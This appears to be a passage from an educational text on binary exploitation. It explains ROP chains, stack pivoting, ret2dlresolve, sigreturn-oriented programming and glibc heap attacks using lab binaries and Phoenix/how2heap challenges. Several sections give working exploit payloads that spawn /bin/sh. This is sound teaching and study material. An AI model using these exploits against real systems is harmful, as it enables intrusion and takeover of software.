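To make the mechanics of Figure 4.6 concrete, the following toy interpreter treats each gadget as a list of register operations followed by an implicit ret, and walks the stack contents shown in the figure. It is a sketch under simplifying assumptions, not an emulator: the gadget encoding and the run_chain function are invented for illustration, eax is modelled as rax, and only xor of a register with itself is supported.

```python
# Each gadget address maps to its operations; the trailing ret is implicit.
GADGETS = {
    0x4045C: [("xor", "rax", "rax")],
    0xF0FEE: [("mov", "rax", 1)],
    0x75A0: [("pop", "rdi")],
    0x1007F: [("mov", "rsi", 0)],
    0x4A0F: [("syscall",)],
}

def run_chain(stack):
    """Walk the overwritten stack the way consecutive ret instructions would."""
    regs = {"rax": None, "rdi": None, "rsi": None}
    syscalls = []
    sp = 0
    while sp < len(stack):
        addr = stack[sp]          # ret pops the next gadget address
        sp += 1
        for op in GADGETS[addr]:
            if op[0] == "pop":    # pop consumes the next stack slot as data
                regs[op[1]] = stack[sp]
                sp += 1
            elif op[0] == "mov":
                regs[op[1]] = op[2]
            elif op[0] == "xor":  # xor reg, reg clears the register
                regs[op[1]] = 0
            elif op[0] == "syscall":
                syscalls.append(dict(regs))
    return regs, syscalls

# Stack slots above the saved rbp, as listed in the figure.
regs, syscalls = run_chain([0x4045C, 0xF0FEE, 0x75A0, 0x7FFFFFFF5E70, 0x1007F, 0x4A0F])
```

Note how the slot after the pop rdi gadget is data, not a return address: the gadget consumes it before its own ret runs.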
Example
We will use the same program as in the ret2libc example, but compiled for 64 bits. Because of
the default calling convention for 64-bit gcc binaries on Linux, we need to pass the "/bin/sh"
string pointer in the register rdi. To accomplish this, we will search for gadgets in the
binary.
Because we control the stack thanks to the stack overflow, we can use a pop rdi instruction
to put our pointer into the register.
Figure 4.7: ROP gadget pop rdi; ret
In this case we also need a NOP gadget to achieve stack alignment. This gadget does nothing
more than return into the following gadget on the chain. With this addition our whole ROP
chain is 32 bytes long, a multiple of the 16-byte stack alignment. If this gadget were omitted,
the ROP chain would be 24 bytes long, which is not divisible by 16 and therefore would not
be aligned.
Figure 4.8: NOP gadget
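The alignment rule of thumb stated above can be sketched as a helper that packs 64-bit chain entries and prepends the ret-only gadget when the chain length is not a multiple of 16. The function build_chain and its parameters are hypothetical, and the addresses are placeholder values; in a real exploit they come from the binary and from libc.

```python
import struct

def build_chain(padding, entries, nop_gadget):
    """Pack 64-bit chain entries, padding the chain to a multiple of 16 bytes."""
    chain = b"".join(struct.pack("<Q", entry) for entry in entries)
    if len(chain) % 16 != 0:
        # A ret-only gadget adds 8 bytes without changing any register.
        chain = struct.pack("<Q", nop_gadget) + chain
    return b"A" * padding + chain

payload = build_chain(
    padding=72,  # buffer plus saved rbp, placeholder value
    entries=[0x4011E3, 0x7FFFF7F795AA, 0x7FFFF7E17410],  # pop rdi, "/bin/sh", system
    nop_gadget=0x4010AF,
)
```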
Before calling system we have to set up the string pointer in rdi, so after the alignment
gadget the pop rdi gadget is the first we return to, followed by the address of "/bin/sh"
and the address of system.
buffer
rbp
Address of nop gadget
Address of pop rdi gadget
Address of "/bin/sh"
Address of system
Figure 4.9: Stack layout for example
We collect the addresses of interest again because we are now using the 64-bit libc.
Figure 4.10: libc base address at runtime
Figure 4.11: system offset from libc base address
Figure 4.12: "/bin/sh" offset from libc base address
Listing 4.3: exploit64.py
exploit = "\x41" * 72
exploit += "\xaf\x10\x40\x00\x00\x00\x00\x00" # nop gadget for stack alignment
exploit += "\xe3\x11\x40\x00\x00\x00\x00\x00" # pop rdi gadget
exploit += "\xaa\x95\xf7\xf7\xff\x7f\x00\x00" # binsh
exploit += "\x10\x74\xe1\xf7\xff\x7f\x00\x00" # system
print exploit
Again, to keep the shell open we need to concatenate the exploit with stdin.
Figure 4.13: Successful exploitation of the rop chain
4.3 Stack pivoting

A stack pivot attack consists of creating a fake stack somewhere in memory and tricking the
program into using it as its stack. This technique is useful when the legitimate stack lacks
space for a ROP chain.
For this attack it is necessary to control the stack pointer register in order to swap the
stack of the program for the attacker-controlled one. To accomplish this, we need to find
some gadgets:
1. pop rsp. Ideal gadget in theory. Hardly found in any executable.
2. xchg reg, rsp. Used in combination with pop reg to write a value to reg and later
   exchange it with rsp. Requires 16 bytes of stack space after the return address.
3. leave; ret. Functions that set up a frame pointer commonly end with leave; ret, which
   makes this case the most plausible. The leave instruction is equivalent to:
       mov rsp, rbp
       pop rbp
   If we execute leave two consecutive times, the value loaded by the first pop rbp will be
   used to set rsp on the second leave.
buffer
Address of fake stack
Address of leave
Figure 4.14: Stack layout for a stack pivoting attack
Example
In this exercise the objective is to pivot the stack to buffer. I will use the leave gadget to
trigger the pivot.
First, we need the leave gadget.
Figure 4.15: leave gadget
The address shown in Figure 4.15 is only an offset from the base address of the binary. To
make it usable, add it to the base address.
Once we have pivoted the stack with the leave gadget, the following ret instruction will pop
the return address from buffer. In this case, I filled it with the address of win so at the
end, we will jump to that function.
padding = 72
exploit = "\xed\x61\x55\x56" * (padding // 4)  # fill the buffer with the address of win
exploit += "\x90\xd0\xff\xff"  # address of buffer (overwrites the saved ebp)
exploit += "\x31\x61\x55\x56"  # leave gadget (overwrites the return address)
print exploit
With this exploit, the sequence of instructions we want to execute is the following.
Instruction      Value or effect
mov esp, ebp
pop ebp          &buffer
ret              leave gadget
mov esp, ebp     Stack pivoting
pop ebp          First 4 bytes of buffer
ret              &win
Figure 4.16: Stack pivoting example: instruction sequence
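The instruction sequence above can be traced with a tiny register and memory model. This is only a sketch: memory is a Python dict of 4-byte words, the helper names are invented, and the frame is assumed to place the saved ebp exactly 72 bytes above the start of buffer, as the padding of the exploit implies. The three addresses are the ones written by the exploit.

```python
BUFFER, WIN, LEAVE_GADGET = 0xFFFFD090, 0x565561ED, 0x56556131

def leave(regs, mem):
    regs["esp"] = regs["ebp"]        # mov esp, ebp
    regs["ebp"] = mem[regs["esp"]]   # pop ebp
    regs["esp"] += 4

def ret(regs, mem):
    regs["eip"] = mem[regs["esp"]]   # pop the return address into eip
    regs["esp"] += 4

# Memory after the overflow: 18 copies of &win, then &buffer, then the gadget.
mem = {BUFFER + 4 * i: WIN for i in range(18)}
mem[BUFFER + 72] = BUFFER            # overwritten saved ebp
mem[BUFFER + 76] = LEAVE_GADGET      # overwritten return address

regs = {"esp": 0, "ebp": BUFFER + 72, "eip": 0}
leave(regs, mem)                     # epilogue of the vulnerable function
ret(regs, mem)
after_first_ret = regs["eip"]
leave(regs, mem)                     # the gadget: esp now moves into buffer
ret(regs, mem)
```

After the second ret, eip holds the address of win and esp points inside buffer, which is the pivot described in the text.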
Setting a breakpoint on win we can see that the esp register now points to the user supplied
buffer. We have pivoted the stack.
Figure 4.17: esp points to buffer
Figure 4.18: Successful exploitation
4.4 ret2dlresolve
ret2dlresolve is a technique for executing dynamically linked functions without knowledge of
their addresses. The attacker tricks the binary into resolving a function of the attacker's
choice through the Procedure Linkage Table (PLT), bypassing ASLR.
When the binary calls a dynamically linked function for the first time and has lazy binding
enabled (no RELRO or Partial RELRO), it jumps into the PLT section to resolve the symbol
on demand.
4.4.1 Structures
In order to resolve a symbol, 3 structures are needed. By faking them, we could trick the
loader to resolve a symbol of our choice.
JMPREL
Corresponds to the .rel.plt section and holds the relocation table. This table maps a
symbol to an offset on the GOT. The r_info field gives us the index of the symbol on the
SYMTAB.
    JMPREL
    r_offset      r_info
    0x0804a00c    0x00000107

SYMTAB
Symbol table. Stores information about the symbols. The most important field for this
exploit is st_name, which is the offset on the STRTAB structure.
    SYMTAB
       st_name    st_...
    1: 0x1a       ...

STRTAB
String table. Stores the names of the symbols.
    STRTAB
    0x804822d: libc.so.6
    0x8048246: read
4.4.2 Symbol resolution

When linking, the linker replaces every call to a dynamically linked function with a call to
an entry in the PLT, located in the .plt section. The PLT contains executable code formed by
stubs. These stubs jump through the GOT to execute the intended function if it is already
resolved. If the function has not been resolved yet, the GOT entry points back into the PLT
entry, which then calls the resolver.
The process for calling a dynamic function is the following:
1. Control is transferred to the .plt entry of the function, for example puts@plt.
2. That .plt entry gets a value from the .got section. This value can have two different
   interpretations:
   (a) If the symbol has been previously resolved, the value points to where the function
       has been loaded at runtime.
       i. Control is transferred to the resolved function, for example puts@libc.
   (b) If the symbol has not been previously resolved, the value points back to a different
       part of the symbol entry on the .plt.
       i. Push the reloc_index. This argument is the entry index on the JMPREL table.
       ii. Jump to the default entry stub on the .plt.
           A. Push the link_map onto the stack.
           B. Call __dl_runtime_resolve.
       iii. Call the resolved symbol.
Every time a symbol is resolved via __dl_runtime_resolve, the corresponding GOT entry
is updated to point to the resolved address.
Figure 4.19: __dl_runtime_resolve execution path
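The lazy binding steps listed above can be modelled in a few lines. This is a conceptual sketch only: LazyLinker, its fields and the dictionary standing in for the loaded libraries are invented for illustration and do not mirror the glibc data structures.

```python
class LazyLinker:
    """Toy model of PLT/GOT lazy binding."""

    def __init__(self, libraries):
        self.libraries = libraries   # symbol name -> callable (the "loaded" code)
        self.got = {}                # resolved GOT entries
        self.resolver_calls = 0

    def resolve(self, name):
        # Stand-in for the resolver: look the symbol up and patch the GOT.
        self.resolver_calls += 1
        self.got[name] = self.libraries[name]
        return self.got[name]

    def call_plt(self, name, *args):
        target = self.got.get(name)
        if target is None:           # first call: the entry is not resolved yet
            target = self.resolve(name)
        return target(*args)         # later calls go straight through the GOT

linker = LazyLinker({"puts": lambda text: len(text)})
first = linker.call_plt("puts", "hello")
second = linker.call_plt("puts", "hi")
```

Only the first call pays for the lookup, which is why the resolver is reachable from every PLT stub and why feeding it attacker-chosen input is attractive.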
__dl_runtime_resolve receives the link_map and the reloc_index as parameters on the
stack, even on x86_64 systems. It then moves these parameters into rdi and rsi
respectively and calls _dl_fixup, which is the resolver.
The source code for the __dl_runtime_resolve function can be found on the glibc source
code.
Faking the data structures and passing them to __dl_runtime_resolve() effectively
corrupts the GOT table and hijacks function calls.
__dl_runtime_resolve is in reality only a wrapper for _dl_fixup, which in turn does
all the heavy lifting for the symbol resolution. Here we can find all the computations
needed to link the JMPREL, SYMTAB and STRTAB structures together to get the symbol
information.
Listing 4.4: _dl_fixup pseudocode.
#define ELF64_R_SYM(i) ((i) >> 32)

void* _dl_fixup(struct link_map* l, Elf64_Word reloc_arg) {
    /* pseudocode: JMPREL and STRTAB offsets are counted in bytes */
    Elf64_Rela* reloc_entry = JMPREL + (reloc_arg * sizeof(Elf64_Rela));
    Elf64_Sym* symbol_entry = &SYMTAB[ELF64_R_SYM(reloc_entry->r_info)];
    const char* symbol_string = STRTAB + symbol_entry->st_name;
    /* ... */
}
Example
Now we can use a buffer overflow to trick __dl_runtime_resolve into resolving the symbols
of our choosing. To do that, we need to jump to the start of the .plt section, where the
code for pushing the link_map and calling __dl_runtime_resolve is found. Before the
jump we need to place on the top of the stack the index on the JMPREL that we want to
resolve. This index will have to point to our fake data structures, written on some buffer,
according to the previous formula.
Elf64_Rela* reloc_entry = JMPREL + (reloc_arg * sizeof(Elf64_Rela));
The address of JMPREL can be found by examining the ELF headers of the executable. If
the binary has PIE enabled, the value will be an offset from the image base; if PIE is not
enabled, the value is an absolute address.
readelf -d a.out | grep -e JMPREL -e STRTAB -e SYMTAB
Figure 4.20: Addresses of the most important tables for the exploit
The type of reloc_arg is Elf64_Word, an alias for a 32-bit unsigned integer. That imposes a
restriction: the distance between the JMPREL and our fake data cannot be greater than
0xffffffff × sizeof(Elf64_Rela) = 0x17FFFFFFE8. Often we can only write to the stack,
which is usually too far away from the JMPREL. In order to be in range, we will need to
call read into a more suitable location. This exploit is going to have 2 stages:
1. ROP chain to write our fake data structures in another buffer near JMPREL, SYMTAB
   and STRTAB.
2. Jump to __dl_runtime_resolve with reloc_arg pointing into the fake data
   structures.
Stage 1
A simple ROP chain to call read on a convenient address that will write the fake data
structures to feed them to the resolver.
exploit = b"A" * 64 # buffer
exploit += b"A" * 8 # rbp
exploit += p64(nop_gadget)
# ...

exploit += p64(set_regs_for_read_gadget)
exploit += p64(0) # stdin_fileno
exploit += p64(fake_data_addr) # buffer
exploit += p64(fake_data_len) # buffer len
exploit += p64(syscall_gadget) # read
The section where the buffer for the fake data will be written must have RW permissions
and must be mapped after the tables. To find such a section we can search the ELF
section headers.
Figure 4.21: .data and .bss segments of the process
Figure 4.22: Mapped segments of the process
I will use the last portion of the last segment of a.out, the address 0x403e00. Because
\[ (\mathtt{0x403e00} - \mathtt{0x400480}) \bmod \mathtt{0x18} = 8 \]
the first 16 bytes (two 8-byte words) of the second buffer will be padding for the
relocation entry, which is going to start at 0x403e10, whose distance from JMPREL is
divisible by 24. Now we compute the value that __dl_runtime_resolve requires to find
the symbol.
\[ \frac{\mathtt{0x403e10} - \mathtt{0x400480}}{\mathtt{0x18}} = \mathtt{0x266} \]
That will be the relocation index passed as a parameter to the resolver.
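The arithmetic above can be checked with a short helper. It is a sketch with hypothetical names (reloc_index_for, RELA_SIZE); the two addresses are the ones used in this example, with 0x400480 taken as the JMPREL address that appears in the formulas.

```python
RELA_SIZE = 0x18  # sizeof(Elf64_Rela)

def reloc_index_for(jmprel, buf_addr):
    """Return (padding, entry_addr, index) for a fake Elf64_Rela at or after buf_addr."""
    padding = (-(buf_addr - jmprel)) % RELA_SIZE   # bytes needed to reach a multiple of 0x18
    entry_addr = buf_addr + padding
    index = (entry_addr - jmprel) // RELA_SIZE
    return padding, entry_addr, index

padding, entry_addr, index = reloc_index_for(0x400480, 0x403E00)
```

The index must also fit in 32 bits, which is the range restriction discussed earlier.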
Figure 4.23: Offsets from the tables to the second buffer (JMPREL to rel: 0x3990; SYMTAB to sym: 0x3a98; STRTAB to system: 0x3a50; the second buffer is labeled 0x43e00 in the figure)

Stage 2
Now we fill the entries in sequence. For the relocation entry, the important field is r_info.
In x86_64 Linux systems, the highest 32 bits of this field hold the index of the symbol entry
in the SYMTAB. The lowest 32 bits store the type of relocation. To bypass a check in
_dl_fixup these bits must be set to 7. The Elf64_Rela struct has one more field of 64 bits
but since this field is unused, I overlapped it with the symbol entry. This trick also helps
me with padding as 0x403e18 is not aligned with SYMTAB. The computation for the index
of the symbol entry follows the same scheme as the relocation offset.
exploit += p64(got_entry_after_read) # Elf64_Rela.r_offset
exploit += p32(0x7) # Elf64_Rela.r_info low
exploit += p32(0x271) # Elf64_Rela.r_info high

exploit += p32(0x3a50) # Elf64_Sym.st_name
exploit += p8(0x0)
The symbol entry has been zeroed out except for the st_name field, which stores the distance
in bytes from STRTAB to a string.

exploit += b"system\x00\x00"
exploit += b"/bin/sh\x00"

with open("wer", "wb") as f:
    f.write(exploit)
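The r_info packing described for the relocation entry can be sketched as follows. The helper names are hypothetical, and the SYMTAB base used in the usage lines is a made-up placeholder; only the symbol index 0x271 and the relocation type 7 come from the exploit.

```python
import struct

SYM_SIZE = 0x18  # sizeof(Elf64_Sym)

def make_r_info(sym_index, rel_type=7):
    """High 32 bits: symbol index. Low 32 bits: relocation type."""
    return (sym_index << 32) | rel_type

def sym_index_for(symtab, sym_addr):
    """Index of a fake Elf64_Sym placed at sym_addr, relative to SYMTAB."""
    offset = sym_addr - symtab
    if offset % SYM_SIZE != 0:
        raise ValueError("fake symbol entry is not aligned to sizeof(Elf64_Sym)")
    return offset // SYM_SIZE

r_info = make_r_info(0x271)
packed = struct.pack("<Q", r_info)

# Placeholder SYMTAB base, for illustration only.
example_index = sym_index_for(0x1000, 0x1000 + 0x3A98)
```

Packing r_info as one little-endian 64-bit value gives the same bytes as writing the low and high halves separately.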
Now, going back to the ROP chain, we need to invoke __dl_runtime_resolve emulating
a legitimate call. To do this, before calling the resolver we need to set up the arguments
for system as if it were already resolved and we were calling it directly: with rdi pointing
to "/bin/sh". We chain a pop rdi; ret gadget followed by the address of the "/bin/sh"
string that we put on the second buffer, after the system string. Once the argument is
correctly set, the next entry on the ROP chain should be the address of the start of the
.plt section, which as shown in Figure 4.19 stores a default stub for calling the resolver,
pushing the link_map onto the stack and jumping into __dl_runtime_resolve.
exploit += p64(rdi_gadget)
exploit += p64(binsh_addr)
exploit += p64(plt_start)
exploit += p64(reloc_arg)
exploit += p64(return_addr)
exploit += p64(binsh_addr)
Figure 4.24: Bytes of the exploit
Figure 4.25: Successful exploitation of a ret2dlresolve attack
4.5 Sigreturn-oriented programming

Sigreturn-oriented programming (SROP) exploits the mechanism of handling signals on
POSIX systems. These systems implement the sigreturn system call, tasked with restoring
the CPU registers with stack values, among other things. By corrupting stack values, an
attacker can set the CPU register values at will.
4.5.1 Signal handler mechanism

When a signal is triggered, a context switch is performed. A context switch implies that the
state of the current execution must be saved, that is, all the CPU registers are pushed onto
the stack along with some additional data. Once the signal has been handled, a sigreturn
system call is called and the CPU registers values are restored.
4.5.2 sigcontext struct

When the sigreturn syscall is called, it expects to find a sigframe struct on the top of
the stack. The sigframe is a structure that holds several pieces of information for restoring
the context of the process. One of these pieces is the sigcontext struct. The sigcontext
struct stores the values of the CPU registers, its flags and the state of the floating point
unit. Its definition is dependent on architecture and operating system, but for example, the
definition for Linux x86 and x86_64 systems can be found in the Linux kernel source.
4.5.3 SROP
SROP is all about creating a fake signal frame on the stack and calling sigreturn to control
all the registers on the CPU. First, the syscall is triggered with conventional
ROP gadgets. On Linux systems, the syscall to invoke is selected by the value of rax when
the syscall instruction gets executed. The rax value for the sigreturn syscall is 0xf on
x86_64 Linux systems and 0x77 on x86 Linux systems.
Once we have placed the correct value on rax and executed syscall, sigreturn is going to be
executed by the kernel, and it expects a signal frame on the top of the stack. By setting the
correct values on the signal frame we can control what we are going to execute next.
Stack (from lower to higher addresses): buffer, rbp, rax gadget, syscall gadget, signal frame

Signal frame
offset   first 8 bytes        second 8 bytes
0x00     rt_sigreturn         uc_flags
0x10     &uc                  uc_stack.ss_sp
0x20     uc_stack.ss_flags    uc_stack.ss_size
0x30     r8                   r9
0x40     r10                  r11
0x50     r12                  r13
0x60     r14                  r15
0x70     rdi                  rsi
0x80     rbp                  rbx
0x90     rdx                  rax
0xa0     rcx                  rsp
0xb0     rip                  eflags
0xc0     cs/gs/fs/ss          err
0xd0     trapno               oldmask
0xe0     cr2                  &fpstate
0xf0     __reserved           sigmask
Figure 4.26: Layout of a SROP exploit in Linux x86_64[5]

Example
First, we need a simple ROP chain that calls a system call. For that we need a pop rax
gadget that sets the correct syscall number on the rax register. Then we execute the syscall
instruction with a syscall gadget. The sigreturn syscall has the number 0xf.
Figure 4.27: SROP gadgets
exploit = b"A" * (padding)
exploit += p64(rax_gadget) # rip
exploit += p64(sigreturn_syscall_number)
exploit += p64(syscall_gadget)
Up to this point this is a normal ROP chain sequence. Now we need to concatenate the
sigcontext struct for the sigreturn syscall.
We are going to call execve("/bin/sh") from the signal frame. In order to do that, we
need to set the correct registers.
rdi: executable file path to run. In our case it is the address of a "/bin/sh" string.
rax: 0x3b, the execve syscall number.
rsp: zeroing this value can be dangerous and cause a segfault. Just point it to some
    random stack address.
rip: because execve is a system call we can reuse the syscall gadget we used previously
    on the ROP chain.
cs: code segment. Used implicitly in the instructions that modify control flow. Necessary
    to jump around. The value is taken from debugging the program.
ss: another segment register. Zeroing it causes a segfault. The value is taken from
    debugging the program.
All the other fields are zeroed out.
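A signal frame with these registers set can be assembled field by field. The sketch below is an assumption-laden illustration, not the payload used in this work: it assumes the frame is placed right after the syscall gadget address and therefore starts at uc_flags (8 bytes after the rt_sigreturn slot of Figure 4.26), the name csgsfsss for the combined segment field is invented, and every value passed in is a placeholder.

```python
import struct

# 8-byte fields in stack order, starting at uc_flags.
FRAME_FIELDS = [
    "uc_flags", "&uc", "uc_stack.ss_sp", "uc_stack.ss_flags", "uc_stack.ss_size",
    "r8", "r9", "r10", "r11", "r12", "r13", "r14", "r15",
    "rdi", "rsi", "rbp", "rbx", "rdx", "rax", "rcx", "rsp",
    "rip", "eflags", "csgsfsss", "err", "trapno", "oldmask", "cr2",
    "&fpstate", "__reserved", "sigmask",
]

def build_frame(values):
    """Pack a fake signal frame; fields not listed in values are zeroed."""
    unknown = set(values) - set(FRAME_FIELDS)
    if unknown:
        raise KeyError("unknown frame fields: %s" % sorted(unknown))
    return b"".join(struct.pack("<Q", values.get(name, 0)) for name in FRAME_FIELDS)

# Placeholder values: real ones come from the target binary and a debugger.
frame = build_frame({
    "rdi": 0x404040,     # hypothetical address of a "/bin/sh" string
    "rax": 0x3B,         # execve
    "rsp": 0x404800,     # some writable address
    "rip": 0x401000,     # hypothetical syscall gadget
    "csgsfsss": 0x33,    # placeholder segment value
})
```

Keeping the field order in one list makes it easy to compare the sketch against the figure row by row.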

Figure 4.28: SROP payload

Figure 4.29: Successful exploitation of an SROP exploit

Chapter 5
Heap exploits
5.1 The heap

The heap is a common term to refer to a portion of memory where programs can allocate
memory at runtime for objects whose size is very large or unknown at compile time, and
therefore, the compiler cannot manage the stack for them. This portion of memory is very
often managed by libraries called allocators, in charge of keeping a record of the allocated
and freed memory, its size, the possibility of reusing freed chunks and the merging of freed
chunks to avoid heap fragmentation.
The C standard includes definitions for a set of heap functions common to everyone, but
the implementation is OS and library-dependent.
malloc
realloc
calloc
free
5.2 glibc malloc

The GNU C malloc library contains implementations for the standard malloc functions,
malloc, free, realloc, and calloc. This allocator manages the blocks of memory handed
to a program in a "heap" style. The GNU malloc implementation is derived from ptmalloc
(pthread's malloc) and in turn, ptmalloc derives from dlmalloc (Doug Lea's malloc).
5.2.1 Common terms

Arena
An arena is a region of memory dedicated to the allocator. Arenas hold references to one
or more heaps from which they allocate and free memory. When a program is started, a
main arena is created that holds a reference to the initial heap. When more threads request
allocations, more arenas can be created to avoid locking the main arena and causing a
bottleneck that could slow down the program.
Heap
Portion of memory reserved for allocations. This memory is subdivided into chunks handled
by the allocator. Heap memory is contiguous, meaning that the chunks are adjacent to one
another.
Chunk
Subdivision of a heap. It is a block of memory with a certain size requested by the
program. Chunks can be merged with neighboring chunks to obtain a larger chunk, or can be
subdivided further to obtain smaller chunks, depending on the needs of the program.
When a chunk is freed, it gets pushed into a circular doubly linked list called a bin. To
save space, all the information required for the linked list management is stored in the
chunk contents. This metadata includes forward and backward pointers and the size of the
neighboring chunks. [source code]
Allocated chunk        Freed chunk
size | flags           size | flags
contents               fwd pointer
...                    bck pointer
                       contents
                       ...
                       previous size
Figure 5.1: Allocated chunk structure. Figure 5.2: Freed chunk structure.
Tcache
The Thread Local Cache is a special list of very recently freed chunks kept for quick
access. It acts as a cache for freed chunks. Each thread owns a tcache containing
a small collection of freed chunks for rapid access without the need to lock global variables or
data structures like the arena, which is shared by all threads of a process, to prevent
data races.
The data structure is an array of bins, each bin being a linked list for chunks of certain sizes.
tcache
size bin
0x20 ...
0x30 ...
0x40 ...
0x50 0x55aabb -> 0x55ccdd -> 0x0
Figure 5.3: Tcache structure
This optimization is present from glibc version 2.26 upwards.

5.3 Heap overflows

Because chunks are contiguous in memory, we can overflow a heap buffer with more data
than it can handle using unbounded write/read functions, just like a normal stack overflow.
Figure 5.4: Heap overflow (a write that starts in the contents of one chunk runs into the size, flags and contents of the next chunk)
Example
To showcase this vulnerability I am going to solve the level heap-one from Phoenix VM.
struct heapStructure {
    int priority;
    char *name;
};

// ...
struct heapStructure *i1, *i2;

i1 = malloc(sizeof(struct heapStructure));
i1->priority = 1;
i1->name = malloc(8);

i2 = malloc(sizeof(struct heapStructure));
i2->priority = 2;
i2->name = malloc(8);

strcpy(i1->name, argv[1]);
strcpy(i2->name, argv[2]);
// ...
Thanks to the structures and the unbounded writes with the strcpy functions we can trigger
an arbitrary write exploit. The second call to strcpy will take as a pointer &name from the
second struct. Because heap chunks are contiguous, the first strcpy call can keep writing
data past the extent of i1.name into the second structure.
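i1: priority | padding | &name | name
i2: priority | padding | &name | name
The first strcpy writes from i1's name up to i2's &name, replacing it with &return_address;
the second strcpy then writes &winner there.
Figure 5.5: heap-one@phoenix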

We will use the first strcpy to overwrite i2.name so that it points to another address, where
the value of the second argument will be written. In this case, I am overwriting it with the
address of the return address on the stack, and the second argument holds the address of the
winner function, performing a classical ret2win exploit but overwriting data on the heap.
Listing 5.1: Pseudocode of the exploit
strcpy(&return_address, &winner);
Figure 5.6: heap-one solved
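The pointer overwrite can be reproduced on a toy heap. Everything in this sketch is an assumption made for illustration: the bump allocator, the 16-byte chunk header, the 64-bit struct layout with the name pointer at offset 8, and the target address. It only models the first strcpy, which is the one that corrupts i2.name.

```python
import struct

HEAP_BASE = 0x1000
HEADER = 16                       # assumed size of a chunk header
heap = bytearray(0x100)
top = 0                           # offset of the next unused byte

def malloc(size):
    """Bump allocator: a header, then the payload rounded up to 16 bytes."""
    global top
    addr = HEAP_BASE + top + HEADER
    top += HEADER + (size + 15) // 16 * 16
    return addr

def write_ptr(addr, value):
    off = addr - HEAP_BASE
    heap[off:off + 8] = struct.pack("<Q", value)

def read_ptr(addr):
    return struct.unpack_from("<Q", heap, addr - HEAP_BASE)[0]

def strcpy(dst, src):
    """Copy up to and including the first NUL byte, with no bounds check."""
    data = src.split(b"\x00")[0] + b"\x00"
    off = dst - HEAP_BASE
    heap[off:off + len(data)] = data

NAME = 8                          # offset of the name pointer inside the struct
i1 = malloc(16)
write_ptr(i1 + NAME, malloc(8))
i2 = malloc(16)
write_ptr(i2 + NAME, malloc(8))

target = 0x7FFDEADBEEF8           # hypothetical location of a saved return address
distance = (i2 + NAME) - read_ptr(i1 + NAME)
strcpy(read_ptr(i1 + NAME), b"A" * distance + struct.pack("<Q", target))
```

Because strcpy stops at the first NUL byte, only the six low bytes of the target are copied; the two high bytes of the old pointer were already zero, so the result is still the full target address.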
5.4 Use-After-Free
A Use-After-Free vulnerability consists of the use of a chunk after it has been freed.
#include <stdlib.h>
#include <string.h>

int main()
{
    char* buffer = malloc(sizeof(char) * 32);

    free(buffer);

    /* buffer still points to the chunk contents */

    memset(buffer, 0x41, sizeof(char) * 32);

    return 0;
}
Example
To exemplify a UAF I will use heap-two from Phoenix VM.
This program consists of a menu allowing us to perform some actions in arbitrary order over
some global variables. The program will check the value of a variable inside the auth
struct. By allocating and then freeing it we can force the following call to malloc to return
the same chunk that was allocated for the auth struct. Because the auth pointer is
never cleared, it points to the chunk that now belongs to the service variable, which we can
control. By writing on service we are also writing on auth, therefore setting the
value that the challenge expects in order to be completed.
Figure 5.7: heap-two@Phoenix
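The aliasing behind this exploit can be shown with a toy allocator. This is a sketch, not glibc: ToyHeap hands out fixed 32-byte chunks and reuses the most recently freed one, and the names auth and service only mirror the variables of the challenge.

```python
class ToyHeap:
    """Fixed-size chunk allocator that reuses freed chunks first."""

    CHUNK = 32

    def __init__(self):
        self.memory = bytearray()
        self.free_list = []

    def malloc(self):
        if self.free_list:
            return self.free_list.pop()      # reuse a freed chunk
        addr = len(self.memory)
        self.memory += bytes(self.CHUNK)     # grow the heap by one chunk
        return addr

    def free(self, addr):
        self.free_list.append(addr)          # the caller's pointer is not cleared

    def write(self, addr, data):
        self.memory[addr:addr + len(data)] = data

    def read(self, addr, size):
        return bytes(self.memory[addr:addr + size])

heap = ToyHeap()
auth = heap.malloc()
heap.free(auth)                  # auth is now a dangling pointer
service = heap.malloc()          # gets the chunk auth still points to
heap.write(service, b"AAAA")
seen_through_auth = heap.read(auth, 4)
```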
5.5 Double free

A double free consists of calling free two consecutive times on the same chunk. This causes
a corruption of the allocator's data structures: the same chunk is appended two times to
the free chunks list and the subsequent mallocs are going to return the same chunk to two
different calls.
#include <stdlib.h>

int main()
{
    void* a = malloc(8);

    free(a); /* appends a's chunk to the free bin */
    free(a); /* appends the same chunk a second time */

    /* free bin: a's chunk -> a's chunk */

    void* b = malloc(8); /* takes a's chunk from the bin */
    void* c = malloc(8); /* takes a's chunk again */

    /* b and c point to the same address */

    return 0;
}
Figure 5.8: Double free vulnerability
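The effect on the free list can be modelled in a few lines. This sketch uses a plain Python list as the bin and performs no double-free detection at all, which is an assumption of the model; real allocators include checks that the model ignores.

```python
import itertools

_fresh = itertools.count(0x1000, 0x20)   # addresses of never-used chunks
free_bin = []                            # LIFO list of freed chunk addresses

def malloc():
    """Reuse a freed chunk if there is one, otherwise carve a new one."""
    return free_bin.pop() if free_bin else next(_fresh)

def free(addr):
    free_bin.append(addr)                # no check for chunks already in the bin

a = malloc()
free(a)
free(a)                                  # the same chunk is now in the bin twice
b = malloc()
c = malloc()
```

Both allocations return the address of a, so two parts of a program would believe they own the same memory.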

Example
This is the fastbin_dup.c exercise from how2heap.
First, we allocate three chunks on the heap, a, b and c. Ideally, we only need one chunk: the
other pointers are needed to bypass some security checks that prevent this kind of
vulnerability. Then, we free a.
We free b and then a again. We have included a's chunk two times in the bin.
Now the heap allocator is going to think they are two different chunks and hand them to
two different malloc calls.
Remember that the variables a, b and c point to the chunk contents, whereas the
addresses shown in the fastbins are the addresses of the chunks.
5.6 Unlink
This attack exploits the UNLINK macro used in the free function. This macro executes
the following instructions, redoing the connections between nodes on the double-linked
list.
#define unlink(P, BK, FD) { \
    FD = P->fd;             \
    BK = P->bk;             \
    FD->bk = BK;            \
    BK->fd = FD;            \
}
FD and BK are pointers to the next and previous chunk of P. If the attacker can control the
chunk to be unlinked, P, we can put arbitrary values on FD and BK.
Imagine the following setup:
    size | flags
    fd = 0x5655d804   (arbitrary memory location)
    bk = 0x5508f311   (arbitrary value)
    contents
    ...
    previous size
Figure 5.9: User controlled chunk
Following the unlink macro execution:
    FD = 0x5655d804
    BK = 0x5508f311
    *(0x5655d804 + 0xc) = 0x5508f311
    *(0x5508f311 + 0x8) = 0x5655d804
That is an arbitrary write. The values on FD and BK should take into account the offset in the
struct. For example, FD should point to an address 0xc bytes lower than the actual address
we want to write to.
Newer glibc versions patched this exploit by adding sanity checks for the chunk headers, so
it no longer works on them.
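The two writes performed by the macro can be traced with a dictionary standing in for memory. This is a sketch of the unchecked, historical behaviour only: the unlink function below is a Python stand-in, the chunk address 0x1000 is a placeholder, and the field offsets 0x8 and 0xc are the 32-bit ones used in the text.

```python
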